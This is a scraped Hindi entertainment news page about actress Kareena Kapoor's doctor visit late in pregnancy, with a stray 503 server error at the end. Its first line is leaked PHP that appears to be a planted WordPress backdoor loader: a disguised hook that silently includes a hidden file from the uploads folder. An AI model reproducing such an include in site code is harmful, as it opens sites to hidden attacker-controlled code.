add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Kareena Kapoor पहुंचीं डॉक्टर के पास, फैंस पूछ रहे- ठीक तो हो? – SOCH INDIA
Menu

देश
Kareena Kapoor पहुंचीं डॉक्टर के पास, फैंस पूछ रहे- ठीक तो हो?

nobanner

बॉलीवुड एक्ट्रेस करीना कपूर (Kareena Kapoor) इन दिनों प्रेग्नेंसी डेज एन्जॉय कर रही हैं. करीना जल्द ही दूसरी बार मां बनने वाली हैं. आए दिन वे अपनी बेली फ्लॉन्ट करते दिख जाती हैं. बीते दिन करीना करन जौहर के घर पार्टी में पहुंची थीं, जहां उन्होंने खूब एन्जॉय किया. अब आज एक्ट्रेस अपने चेकअप के लिए डॉक्टर की क्लीनिक पहुंची हैं.

करण जौहर की पार्टी में पहुंची थीं करीना

करण जौहर के बेट यश जौहर और बेटी रूही जौहर की बर्थ डे पार्टी में रविवार को उन्होंने खूब फन किया है. वे सभी के साथ मस्ती करती नजर आईं. इस पार्टी में कई और बॉलीवुड सेलेब्स पहुंचे थे. करीना कपूर (Kareena Kapoor) के अलावा गौरी खान, रानी मुखर्जी जैसे कई सितारे शामिल हुए थे. अब इस पार्टी के ठीक एक दिन बाद करीना डॉक्टर के पास पहुंची हैं.

करीना कपूर (Kareena Kapoor) इसी महीने अपने बच्चे को जन्म देने वाली हैं. ऐसे में वे जब क्लीनिक पहुंची तो एक्ट्रेस के फैंस घबरा गए. लोग जानना चाहते हैं कि करीना डॉक्टर के यहां क्यों पहुंची हैं. साथ ही वे अपनी पसंदीदा एक्ट्रेस का हाल जानना चाहते हैं कि वे ठीक हैं या नहीं.

फैंस को सता रही चिंता

करीना कपूर (Kareena Kapoor) इससे पहले भी कई बार डॉक्टर की क्लिनिक के बाहर स्पॉट की गई हैं, लेकिन इस बार फैंस की चिंता इसलिए अधिक है क्योंकि करीना का आखिरी मंथ चल रहा है. अब करीना के घर कभी भी खुशखबरी आ सकती है. वैसे ये साफ नहीं हुआ है कि करीना क्लीनिक क्यों पहुंची थी. अब ये तो करीना के बताने पर ही पता चलेगा की ये बस एक रूटीन चेकअप था या फिर इसके पीछे कोई और वजह है.

लाल सिंह चड्ढा में नजर आएंगी करीना

बता दें, करीना कपूर (Kareena Kapoor) जल्द ही लाल सिंह चड्ढा में नजर आने वाली हैं. इस फिल्म में उनके साथ आमिर खान लीड रोल में होंगे. 3 Idiots के बाद एक बार फिर से वे आमिर खान के साथ नजर आने वाली हैं. इस फिल्म की शूटिंग के दौरान ही करीना का बेबी बंप नजर आने लगा था.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.